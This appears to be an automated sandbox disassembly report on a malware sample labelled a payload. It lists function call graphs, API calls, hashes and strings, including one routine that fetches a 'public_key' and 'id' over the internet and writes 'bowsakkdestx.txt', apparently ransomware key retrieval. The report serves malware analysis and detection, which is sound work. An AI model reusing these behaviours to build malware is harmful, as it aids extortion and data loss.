                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3074076210-0
                                                                                                                                                                        • Opcode ID: da75cee01b561e30451046c794bb86e87ca9fb7dcf8ecfab63360c4abce99f12
                                                                                                                                                                        • Instruction ID: e226e3c382dc82a2cbd73ac92b9c58fdeb116de7ba92421f2999d215289a2643
                                                                                                                                                                        • Opcode Fuzzy Hash: da75cee01b561e30451046c794bb86e87ca9fb7dcf8ecfab63360c4abce99f12
                                                                                                                                                                        • Instruction Fuzzy Hash: 59F0D17540020DA7CF14BA98DC56EFEBBE8DB00751F0044A9FC5496182DFF09A8482D4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BBFB64 Relevance: 3.0, APIs: 2, Instructions: 17COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1091 bbfb64-bbfb77 call bb8520 1094 bbfb79-bbfb8c call bb8af7 1091->1094 1095 bbfba5-bbfbaa call bb8565 1091->1095 1100 bbfb99-bbfba0 call bbfbab 1094->1100 1101 bbfb8e call bbfe47 1094->1101 1100->1095 1104 bbfb93 1101->1104 1104->1100
                                                                                                                                                                        APIs
                                                                                                                                                                        • __lock.LIBCMT ref: 00BBFB7B
                                                                                                                                                                          • Part of subcall function 00BB8AF7: __mtinitlocknum.LIBCMT ref: 00BB8B09
                                                                                                                                                                          • Part of subcall function 00BB8AF7: __amsg_exit.LIBCMT ref: 00BB8B15
                                                                                                                                                                          • Part of subcall function 00BB8AF7: EnterCriticalSection.KERNEL32(00BB3B69,?,00BB50D7,0000000D), ref: 00BB8B22
                                                                                                                                                                        • __tzset_nolock.LIBCMT ref: 00BBFB8E
                                                                                                                                                                          • Part of subcall function 00BBFE47: __lock.LIBCMT ref: 00BBFE6C
                                                                                                                                                                          • Part of subcall function 00BBFE47: ____lc_codepage_func.LIBCMT ref: 00BBFEB3
                                                                                                                                                                          • Part of subcall function 00BBFE47: __getenv_helper_nolock.LIBCMT ref: 00BBFED4
                                                                                                                                                                          • Part of subcall function 00BBFE47: _free.LIBCMT ref: 00BBFF07
                                                                                                                                                                          • Part of subcall function 00BBFE47: _strlen.LIBCMT ref: 00BBFF0E
                                                                                                                                                                          • Part of subcall function 00BBFE47: __malloc_crt.LIBCMT ref: 00BBFF15
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __lock$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1282695788-0
                                                                                                                                                                        • Opcode ID: 477e102157aa38582eb5b0c8c1282964bafa1871ba6fb5c25b8296c0b912f11a
                                                                                                                                                                        • Instruction ID: 8a9fabcec1916f787aff6dc2599c69cca565b5e7f89d4f9a4c6bdde87e30f2c9
                                                                                                                                                                        • Opcode Fuzzy Hash: 477e102157aa38582eb5b0c8c1282964bafa1871ba6fb5c25b8296c0b912f11a
                                                                                                                                                                        • Instruction Fuzzy Hash: 28E0EC35451246DBEB30ABB0DD1A7FC72E4EB1132AF1591A5E420161D28FF84584CA22
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BB7B0B Relevance: 3.0, APIs: 2, Instructions: 7COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1105 bb7b0b-bb7b1a call bb7ad7 ExitProcess
                                                                                                                                                                        APIs
                                                                                                                                                                        • ___crtCorExitProcess.LIBCMT ref: 00BB7B11
                                                                                                                                                                          • Part of subcall function 00BB7AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,00BB7B16,00BB3B69,?,00BB8BCA,000000FF,0000001E,00C97BD0,00000008,00BB8B0E,00BB3B69,00BB3B69), ref: 00BB7AE6
                                                                                                                                                                          • Part of subcall function 00BB7AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00BB7AF8
                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00BB7B1A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2427264223-0
                                                                                                                                                                        • Opcode ID: d33d1a5bae039d63a13643e5c5c2427e5b1e23270d4facc7eda1bdd08a02e43b
                                                                                                                                                                        • Instruction ID: 4c59a99a3446a3d892a3082827e374ae6e760a9b83a1f8fd2dd34cab06dd8937
                                                                                                                                                                        • Opcode Fuzzy Hash: d33d1a5bae039d63a13643e5c5c2427e5b1e23270d4facc7eda1bdd08a02e43b
                                                                                                                                                                        • Instruction Fuzzy Hash: 75B09230005208BFCB052F51DC0A9AD3F69EB40391F008020F91808032EFB2AA919AC0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BACC50 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1108 bacc50-bacc62 call bb3b4c 1111 bacc83-bacc88 call bdf1bb 1108->1111 1112 bacc64-bacc69 1108->1112 1114 bacc6b-bacc6f 1112->1114 1115 bacc71 1112->1115 1116 bacc74-bacc7b 1114->1116 1115->1116 1118 bacc7f-bacc80 1116->1118 1119 bacc7d 1116->1119 1119->1118
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BB3B4C: _malloc.LIBCMT ref: 00BB3B64
                                                                                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00BACC83
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 657562460-0
                                                                                                                                                                        • Opcode ID: 38c33b148a0880c22fef826a72848e8db45d7a5f4ef6098ecc29bd5a340866da
                                                                                                                                                                        • Instruction ID: 688e6031b35b5a6cbb913ebceb766b318d39fd45c484ff4daf71c151d211e621
                                                                                                                                                                        • Opcode Fuzzy Hash: 38c33b148a0880c22fef826a72848e8db45d7a5f4ef6098ecc29bd5a340866da
                                                                                                                                                                        • Instruction Fuzzy Hash: 94E086357082059BDB18DE12C451A7A7BD5DF93BA0B2480BDAC0E8B751FA30D904D7E1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BB7F3D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1120 bb7f3d-bb7f47 call bb7e0e 1122 bb7f4c-bb7f50 1120->1122
                                                                                                                                                                        APIs
                                                                                                                                                                        • _doexit.LIBCMT ref: 00BB7F47
                                                                                                                                                                          • Part of subcall function 00BB7E0E: __lock.LIBCMT ref: 00BB7E1C
                                                                                                                                                                          • Part of subcall function 00BB7E0E: DecodePointer.KERNEL32(00C97B08,0000001C,00BB7CFB,00BB3B69,00000001,00000000,?,00BB7C49,000000FF,?,00BB8B1A,00000011,00BB3B69,?,00BB50D7,0000000D), ref: 00BB7E5B
                                                                                                                                                                          • Part of subcall function 00BB7E0E: DecodePointer.KERNEL32(?,00BB7C49,000000FF,?,00BB8B1A,00000011,00BB3B69,?,00BB50D7,0000000D), ref: 00BB7E6C
                                                                                                                                                                          • Part of subcall function 00BB7E0E: EncodePointer.KERNEL32(00000000,?,00BB7C49,000000FF,?,00BB8B1A,00000011,00BB3B69,?,00BB50D7,0000000D), ref: 00BB7E85
                                                                                                                                                                          • Part of subcall function 00BB7E0E: DecodePointer.KERNEL32(-00000004,?,00BB7C49,000000FF,?,00BB8B1A,00000011,00BB3B69,?,00BB50D7,0000000D), ref: 00BB7E95
                                                                                                                                                                          • Part of subcall function 00BB7E0E: EncodePointer.KERNEL32(00000000,?,00BB7C49,000000FF,?,00BB8B1A,00000011,00BB3B69,?,00BB50D7,0000000D), ref: 00BB7E9B
                                                                                                                                                                          • Part of subcall function 00BB7E0E: DecodePointer.KERNEL32(?,00BB7C49,000000FF,?,00BB8B1A,00000011,00BB3B69,?,00BB50D7,0000000D), ref: 00BB7EB1
                                                                                                                                                                          • Part of subcall function 00BB7E0E: DecodePointer.KERNEL32(?,00BB7C49,000000FF,?,00BB8B1A,00000011,00BB3B69,?,00BB50D7,0000000D), ref: 00BB7EBC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Pointer$Decode$Encode$__lock_doexit
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2158581194-0
                                                                                                                                                                        • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                                                                        • Instruction ID: e76e354a6dbe61b98edff47a5ef08d68f14e016717c277f9264e8aa4df8f022c
                                                                                                                                                                        • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                                                                        • Instruction Fuzzy Hash: F5B012719C430C3BDA113641EC03F553B4C8B80B50F2000B0FA0C1C1E1A9D3F96040C9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                        Function 00C11920 Relevance: 121.3, APIs: 41, Strings: 28, Instructions: 587libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetVersionExA.KERNEL32(00000094), ref: 00C11983
                                                                                                                                                                        • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00C11994
                                                                                                                                                                        • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 00C119A1
                                                                                                                                                                        • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 00C119AE
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 00C119E8
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 00C119FB
                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00C11AC5
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00C11ADB
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00C11AEE
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00C11B01
                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00C11C15
                                                                                                                                                                        • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00C11C36
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00C11C50
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00C11C63
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00C11C76
                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00C11D45
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00C11D73
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00C11D86
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Heap32First), ref: 00C11D99
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Heap32Next), ref: 00C11DAC
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00C11DBF
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00C11DD2
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Process32First), ref: 00C11DE5
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Process32Next), ref: 00C11DF8
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Thread32First), ref: 00C11E0B
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Thread32Next), ref: 00C11E1E
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Module32First), ref: 00C11E31
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Module32Next), ref: 00C11E44
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00C11F03
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00C11FF1
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00C12066
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00C12095
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00C120FB
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00C12118
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00C12187
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00C121A4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$CountTick$Library$Load$Free$Version
                                                                                                                                                                        • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                                                                                                                                                                        • API String ID: 842291066-1723836103
                                                                                                                                                                        • Opcode ID: b327a9a5236ddfd9fcd57ed638f7d4ccb2312b3bf73e0a7a21ee4dd1bea99522
                                                                                                                                                                        • Instruction ID: b5b8b5f3c8f7505c541fb7f533bb3e78c22343c57374804b3a774d634d99580a
                                                                                                                                                                        • Opcode Fuzzy Hash: b327a9a5236ddfd9fcd57ed638f7d4ccb2312b3bf73e0a7a21ee4dd1bea99522
                                                                                                                                                                        • Instruction Fuzzy Hash: FE324EB4E003299BDB219F68CC45BEEB6B9FF45704F0441EAA60CA6151EB748EC0DF59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BAE690 Relevance: 110.9, APIs: 54, Strings: 9, Instructions: 696stringnetworkfileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • timeGetTime.WINMM(?,?,?,?,?,00C5B3EC,000000FF), ref: 00BAE6C0
                                                                                                                                                                          • Part of subcall function 00B9C6A0: RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 00B9C6C2
                                                                                                                                                                          • Part of subcall function 00B9C6A0: RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 00B9C6F3
                                                                                                                                                                          • Part of subcall function 00B9C6A0: RegCloseKey.ADVAPI32(00000000), ref: 00B9C700
                                                                                                                                                                        • _memset.LIBCMT ref: 00BAE707
                                                                                                                                                                          • Part of subcall function 00B9C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00B9C51B
                                                                                                                                                                        • InternetOpenW.WININET ref: 00BAE743
                                                                                                                                                                        • _wcsstr.LIBCMT ref: 00BAE7AE
                                                                                                                                                                        • _memmove.LIBCMT ref: 00BAE838
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 00BAE90A
                                                                                                                                                                        • lstrcatW.KERNEL32(?,&first=false), ref: 00BAE93D
                                                                                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00BAE954
                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00BAE96F
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00BAE98C
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00BAE9A3
                                                                                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 00BAE9CD
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00BAE9F3
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00BAE9F6
                                                                                                                                                                        • _strstr.LIBCMT ref: 00BAEA36
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00BAEA59
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00BAEA74
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00BAEA82
                                                                                                                                                                        • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 00BAEA92
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00BAEAA4
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00BAEABA
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00BAEAC8
                                                                                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 00BAEAE3
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BAEB5B
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00BAEB7C
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BAEB86
                                                                                                                                                                        • _memset.LIBCMT ref: 00BAEB94
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 00BAEBAE
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BAEBB6
                                                                                                                                                                        • _strstr.LIBCMT ref: 00BAEBDA
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00BAEC00
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00BAEC24
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00BAEC32
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00BAEC3E
                                                                                                                                                                        • lstrlenA.KERNEL32(","id":"), ref: 00BAEC51
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00BAEC6D
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00BAEC7F
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00BAEC93
                                                                                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 00BAECB3
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BAED2A
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00BAED4B
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BAED55
                                                                                                                                                                        • _memset.LIBCMT ref: 00BAED63
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 00BAED7D
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BAED85
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00BAEDA3
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00BAEDAE
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00BAEDD3
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00BAEDF7
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00BAEE05
                                                                                                                                                                        • _free.LIBCMT ref: 00BAEE15
                                                                                                                                                                        • _free.LIBCMT ref: 00BAEE22
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BAEF61
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BAEFBF
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
